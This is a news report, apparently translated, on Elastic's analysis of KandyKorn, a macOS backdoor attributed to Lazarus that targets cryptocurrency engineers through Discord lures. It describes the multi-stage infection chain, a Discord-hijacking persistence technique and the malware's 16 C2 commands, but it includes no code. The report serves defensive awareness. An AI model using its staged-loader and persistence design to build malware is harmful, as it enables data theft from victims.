A new malware for macOS called 'KandyKorn' has been detected in a campaign attributed to the North Korean hacker group Lazarus, targeting blockchain engineers at a cryptocurrency exchange platform.
Attackers impersonate members of the cryptocurrency community in Discord channels to spread Python-based modules that trigger a multi-stage KandyKorn infection chain.
Elastic security discovered and attributed The attacks on Lazarus were based on overlaps with previous campaigns related to the techniques used, network infrastructure, code signing certificates, and custom Lazarus detection rules.
Targeting the crypto community
The attack, which begins on Discord, begins with social engineering attacks on targets to trick them into downloading a malicious ZIP file called 'Cross-platform Bridges.zip'.
The victim is tricked into believing that they are downloading a legitimate arbitrage bot designed for automated generation of profits from cryptocurrency transactions.
Instead, the contained Python script ('Main.py') will import 13 modules from an equal number of scripts in the ZIP, launching the first payload, 'Watcher.py'.
Watcher.py is a downloader that unzips and runs a second Python script called 'testSpeed.py' along with another Python file called 'FinderTools', downloaded from a Google Drive URL.
FinderTools is a dropper that retrieves and launches an obfuscated binary called 'SugarLoader', which appears under two names and instances, as .sld and .log Mach-O executables.
Sugarloader establishes a connection to the command and control (C2) server to obtain and load the final payload, KandyKorn, into memory using reflective binary loading.
macOS persistence trick
In the final stage of the attack, a loader known as HLoader is used, which impersonates Discord and uses macOS binary code signing techniques seen in previous Lazarus campaigns.
HLoader establishes SugarLoader persistence by hijacking the actual Discord app on the infected system, following a series of binary renaming actions.
"We observed that the threat actor adopted a technique we have never seen used before to achieve persistence on macOS, known as execution stream hijacking," Elastic explains.
Specifically, HLOADER performs the following operations upon launch:
- Discord is renamed MacOS.tmp
- Rename legitimate Discord binary from .lock to Discord
- Run Discord and .log using NSTask.launchAndReturnError
- Rename both files to their initial names
kandykorn
KandyKorn is an advanced late-stage payload that allows Lazarus to access and steal data from the infected computer.
It operates in the background like a daemon, waiting for commands from the C2 server and avoiding sending heartbeats to minimize its trace on the system.
KandyKorn supports the following 16 commands:
- 0xD1: program ends.
- 0xD2: Collect system information.
- 0xD3: Lists the contents of the directory.
- 0xD4: Parse directory properties.
- 0xD5: Upload files from C2 to the victim's computer.
- 0xD6: Exfiltrate victim files to C2.
- 0xD7: Archive and exfiltrate directories.
- 0xD8: Safely delete files by overwriting them with zeros.
- 0xD9: Lists all running processes.
- 0xDA: Kill a specific process.
- 0xDB: Executes system commands through a pseudoterminal.
- 0xDC: Retrieves the command outputs.
- 0xDD: Start an interactive shell.
- 0xDE: Recovers the current configuration.
- 0xDF: Update C2 configuration.
- 0xE0: Pause operations temporarily.
In short, KandyKorn is a particularly stealthy backdoor capable of recovering data, listing directories, uploading/downloading files, securely deleting, terminating processes, and executing commands.
The cryptocurrency sector remains a primary target for Lazarus, motivated primarily by financial gain rather than espionage, which is its other primary operational focus.
The existence of KandyKorn underscores that macOS is within Lazarus' target range, showing the threat group's remarkable ability to create sophisticated, discreet malware designed for Apple computers.
